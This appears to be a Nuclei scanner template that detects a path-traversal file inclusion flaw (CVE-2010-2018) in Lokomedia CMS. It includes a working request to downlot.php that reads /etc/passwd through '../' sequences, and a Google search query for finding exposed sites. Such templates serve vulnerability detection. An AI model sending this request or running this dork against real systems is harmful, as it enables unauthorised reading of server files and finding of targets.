id: CVE-2010-2018 info: name: Lokomedia CMS - Local File Inclusion author: r3Y3r53 severity: high description: A Local File Inclusion (LFI) vulnerability exists in Lokomedia CMS. The application allows an attacker to include files on the server that should not be accessible, potentially exposing sensitive information. impact: | Attackers can read sensitive files from the server, potentially leading to information disclosure. remediation: | Update to the latest version or apply security patches to fix the vulnerability. reference: - https://cxsecurity.com/issue/WLB-2018070116 - https://github.com/kangkuswae/CMS-Lokomedia - https://nvd.nist.gov/vuln/detail/CVE-2010-2018 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2018 epss-score: 0.03258 epss-percentile: 0.87064 cwe-id: CWE-22 metadata: verified: true max-request: 1 google-query: inurl:/semua-download.html tags: cve,cve2010,lfi,lokomedia,cms,vuln http: - method: GET path: - "{{BaseURL}}/downlot.php?file=../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: header words: - "application/proses" - type: status status: - 200 # digest: 4a0a004730450220500cf3b68f71e15e5b053566fabf9de9d239a53e92fcaaaa1b97ef235976b00f02210080d81d47b8773cafab8425863fc3e18b15cb4abf467394d2714f41f5b56cb5dc:922c64590222798bb761d5b6d8e72950